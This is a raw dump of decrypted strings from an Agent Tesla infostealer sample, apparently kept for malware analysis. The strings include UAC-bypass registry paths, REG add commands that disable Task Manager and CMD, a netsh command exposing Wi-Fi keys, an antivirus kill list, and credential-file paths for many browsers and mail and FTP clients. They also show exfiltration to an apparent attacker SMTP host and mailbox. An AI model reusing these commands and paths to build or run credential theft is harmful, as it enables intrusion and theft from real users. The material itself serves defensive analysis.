agentesla encrypted strings

Sample: 5bef6695ab6acdf941e1e7efef27941cb050256771a2b585d80716a673a1b938
---------

Software\\Classes
ms-settings\\shell\\open\\command
Software\\Classes\\ms-settings\\shell\\open\\command
DelegateExecute
C:\\Windows\\System32\\computerdefaults.exe
Software\\Classes\\ms-settings\\shell
open\\command
mscfile\\shell\\open\\command
C:\\Windows\\System32\\eventvwr.exe
Software\\Classes\\mscfile\\shell
IsInRole
\\
Windows 7
Windows 8
Windows 10
\\temp.tmp
1
%startupfolder%
\\%insfolder%\\
Software\\Microsoft\\Windows\\CurrentVersion\\Run
%insregname%
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run
Shutdown -r -t 5
True
Johnson
Miller
michael
Abby
Emily
John
Player
playerf4
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe
C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\MSBuild.exe
root\\CIMV2
SELECT * FROM Win32_VideoController
SELECT * FROM Win32_Processor
Name
MB
AdapterRAM
Unknown
WebCap
\\CamCampture
\\CamCampture\\webcam.jpeg
/
Webcam Capture From:
<span style=font-family:Courier New;font-size:14px;font-style:normal;font-weight:bold;text-decoration:none;text-tra
nsform:none;color:#000000;>Local Time :
young@inquiry.space
yyyy_MM_dd_HH_mm_ss
Webcam_
-
_IP_Adress_
_
.jpeg
\\ScreenShot
\\ScreenShot\\screen.jpeg
screenshots
Screen Capture From:
Screenshot_
/log.tmp
keylog
[SavedLog (
[Saved Log]
Keystrokes From:
</span>
Saved_Log_From_
.html
<html><span style=font-family:Courier New;font-size:14px;font-style:normal;font-weight:bold;text-decoration:none;te
xt-transform:none;color:#000000;>Local Time :
</span></html>
Keystrokes_
update
info
uninstall
Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows
Load
%ftphost%/
%ftpuser%
%ftppassword%
STOR
Length
Write
Close
type={0}hwid={1}time={2}pcname={
Port
User
PW
CoreFTP
Passwords Recovered From:
Local Time :
Password_Recoveries_
</html>
^HJBanD5
smtp.inquiry.space
:Zone.Identifier
%DownLink%
/%filename%
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System
EnableLUA
0
REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
REG add HKCU\\Software\\Policies\\Microsoft\\Windows\\System /v DisableCMD /t REG_DWORD /d 1 /f
HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System
DisableCMD
REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoRun /t REG_DWORD /d 1 /f
REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoControlPanel /t REG_DWORD /d 1
/f
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System
DisableRegistryTools
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore
DisableSR
REG add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoFolderOptions /t
REG_DWORD /d 1 /f
REG add HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoFolderOptions /t
REG_DWORD /d 1 /f
SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths
MSCONFIG.EXE
\\tmpG
.tmp
Length
length must be > 0
anubis
a2servic
ashWebSv
hvk
avgemc
bdagent
avp
keyscrambler
mbam
ekrn
egui
npfmsg
ollydbg
outpost
Wireshark
mcagent
mcuimgr
clamauto
cpf
ewido
FPAVServer
SbieSvc
antigen
ccapp
tmlisten
pccntmon
earthagent
spysweeper
%filter_list%
p=
%PostURL%
Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
POST
+
%2B
application/x-www-form-urlencoded
http://checkip.dyndns.org/
\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}
&
&
<
<
>
>
"
"
:
]<span style=font-style:normal;text-decoration:none;text-transform:none;color:#000000;> (
False
<font color=#008000>{BACK}</font>
</font>
<font color=#008000>{ALT+TAB}</font>
<font color=#008000>{ALT+F4}</font>
<font color=#008000>{TAB}</font>
<font color=#008000>{ESC}</font>
<font color=#008000>{Win}</font>
<font color=#008000>{CAPSLOCK}</font>
<font color=#008000>↑</font>
<font color=#008000>↓</font>
<font color=#008000>←</font>
<font color=#008000>→</font>
<font color=#008000>{DEL}</font>
<font color=#008000>{END}</font>
<font color=#008000>{HOME}</font>
<font color=#008000>{Insert}</font>
<font color=#008000>{NumLock}</font>
<font color=#008000>{PageDown}</font>
<font color=#008000>{PageUp}</font>
<font color=#008000>{ENTER}</font>
<font color=#008000>{F1}</font>
<font color=#008000>{F2}</font>
<font color=#008000>{F3}</font>
<font color=#008000>{F4}</font>
<font color=#008000>{F5}</font>
<font color=#008000>{F6}</font>
<font color=#008000>{F7}</font>
<font color=#008000>{F8}</font>
<font color=#008000>{F9}</font>
<font color=#008000>{F10}</font>
<font color=#008000>{F11}</font>
<font color=#008000>{F12}</font>
control
<font color=#008000>{CTRL}</font>
.lnk
WScript.Shell
CreateShortcut
TargetPath
cmd.exe
WorkingDirectory
Arguments
/c start
" "
&start;
& exit
IconLocation
Save
.lnk
&explorer; /root,"%CD%
" & exit
%SystemRoot%\\system32\\SHELL32.dll,3
Software\\Classes\\
OpenSubKey
GetValue
\\DefaultIcon\\
,
,0
None
win32_processor
processorID
WinMgmts:
InstancesOf
Win32_BaseBoard
SerialNumber
x2
origin_url
username_value
password_value
\\Google\\Chrome\\User Data\\
Profile
Default
\\Login Data
Chrome
logins
Opera Software\\Opera Stable\\Login Data
Opera
Yandex\\YandexBrowser\\User Data\\Default\\Login Data
Yandex
firefox
logins.json
\\"(hostname|encryptedPassword|encryptedUsername)":"(.*?)"
firefox
temp
.exe
firefoxf4
@@@
IELibrary
IELibrary.InternetExplorer
GetSavedPasswords
URL
UserName
Password
Browser
\\Common Files\\Apple\\Apple Application Support\\plutil.exe
\\Apple Computer\\Preferences\\keychain.plist
seamonkey
seamonkey
Comodo\\Dragon\\User Data\\Default\\Login Data
Comodo Dragon
MapleStudio\\ChromePlus\\User Data\\Default\\Login Data
CoolNovo
Chromium\\User Data\\Default\\Login Data
SRWare Iron
Torch\\User Data\\Default\\Login Data
Torch Browser
UCBrowser\\
*
Login Data
journal
UC Browser
wow_logins
PopPassword
SmtpPassword
Software\\IncrediMail\\Identities\\
\\Accounts_New
EmailAddress
SmtpServer
incredimail
HKEY_CURRENT_USER\\Software\\Qualcomm\\Eudora\\CommandLine
current
Settings
SavePasswordText
ReturnAddress
Eudora
thunderbird
signons.sqlite
moz_logins
hostname
encryptedUsername
encryptedPassword
thunderbird
postbox
postbox
flock
signons3.txt
---
.
Flock Browser
netsh
wlan show profile
All User Profile
All User Profile * : (?<profile>.*)
Profile
Wi-Fi
wlan show profile name="
" key=clear
Key Content * : (?<password>.*)
Password
No Password!
ALLUSERSPROFILE
\\\\
DynDNS\\Updater\\config.dyndns
username=
=
password=
&H;
t6KzXhCh
http://DynDns.com
DynDNS
\\FileZilla\\recentservers.xml
<Server>
<Host>
</Host>
:
<Port>
</Port>
<User>
</User>
<Pass encoding="base64">
</Pass>
<Pass>
FileZilla
SOFTWARE\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions
hostname
PublicKeyFile
PortNumber
22
[PRIVATE KEY LOCATION: "{0}"]
WinSCP
UserName
All Users
\\FlashFXP\\3quick.dat
IP=
port=
user=
pass=
created=
FlashFXP
SystemDrive
\\FTP Navigator\\Ftplist.txt
Server
No Password
FTP Navigator
Programfiles(x86)
programfiles
\\jDownloader\\config\\database.script
Programfiles(x86)
INSERT INTO CONFIG VALUES('AccountController','
sq
.
t
xt
JDownloader
Software\\Paltalk
HKEY_CURRENT_USER\\Software\\Paltalk\\
pwd
http://Paltalk.com
Paltalk
\\.purple\\accounts.xml
<account>
<protocol>
</protocol>
<name>
</name>
<password>
</password>
Pidgin
\\SmartFTP\\Client 2.0\\Favorites\\Quick Connect\\
SmartFTPClient 2.0FavoritesQuick Connect*.xml
<password>
</password>
<name>
</name>
SmartFTP
APPDATA
\\Ipswitch\\WS_FTP\\Sites\\ws_ftp.ini
Host
UID
pwd
WS_FTP
PWD=
Substring
Password decryption failed!
Key
Mode
IV
Padding
CreateDecryptor
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\FTP Commander\\UninstallString
uninstall.exe
Ftplist.txt
;Server=
;Port=
;Password=
;User=
;Anonymous=
Name=
FTPCommander
HKEY_LOCAL_MACHINE\\SOFTWARE\\Vitalwerks\\DUC
HKEY_CURRENT_USER\\SOFTWARE\\Vitalwerks\\DUC
UserName
http://no-ip.com
NO-IP
Input text must be a multiple of 4 characters!
+-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Input contains illegal character '
'!
\\The Bat!
\\Account.CFN
TheBat
Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676
Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging
Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676
Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676
Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676
Email
IMAP Password
POP3 Password
HTTP Password
SMTP Password
GetBytes
SMTP Server
Not found!
Outlook
HKEY_CURRENT_USER\\Software\\Aerofox\\FoxmailPreview
Executable
HKEY_CURRENT_USER\\Software\\Aerofox\\Foxmail\\V3.1
FoxmailPath
\\Storage\\
\\mail\\
\\VirtualStore\\Program Files\\Foxmail\\mail\\
\\VirtualStore\\Program Files (x86)\\Foxmail\\mail\\
\\Accounts\\Account.rec0
\\Account.stg
\\fox.temp
Read
Dispose
POP3Host
SMTPHost
IncomingServer
Account
MailAddress
POP3Password
!empty!
Foxmail
5A
71
No Data!
\\Opera Mail\\Opera Mail\\wand.dat
opera:
Opera Mail
abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\\|';:,<>/?+=
\\Pocomail\\accounts.ini
POPPass
SMTPPass
SMTP
PocoMail
No Data!
[
]
;
<array>
<dict>
<string>
</string>
<data>
</data>
Safari Browser
-convert xml1 -s -o "
\\fixed_keychain.xml"
A
10
B
11
C
12
D
13
E
14
F
15
ABCDEF
PK11_GetInternalKeySlot
PK11_FreeSlot
ATOB_ConvertAsciiToItem_Util
ATOB_ConvertAsciiToItem
PK11SDR_Decrypt
NSS_Shutdown
PK11_Authenticate
Programfiles(x86)
\\Mozilla Firefox\\nss3.dll
\\Mozilla Firefox\\
programfiles
\\Postbox\\nss3.dll
\\Postbox\\
\\Mozilla Thunderbird\\nss3.dll
\\Mozilla Thunderbird\\
\\SeaMonkey\\nss3.dll
\\SeaMonkey\\
\\Flock\\nss3.dll
\\Flock\\
\\vcruntime140.dll
mozglue.dll
nss3.dll
NSS_Init
Password could not decrypted.
Copy
\\Mozilla\\Firefox\\
Path=([A-z0-9\\/\\.]+)
profiles.ini
\\Mozilla\\SeaMonkey\\
\\Flock\\Browser\\
\\Thunderbird\\
(
IndexOf
UNIQUE
table
No Data
RegRead
Software\\DownloadManager\\Passwords\\
EncPassword
Internet Download Manager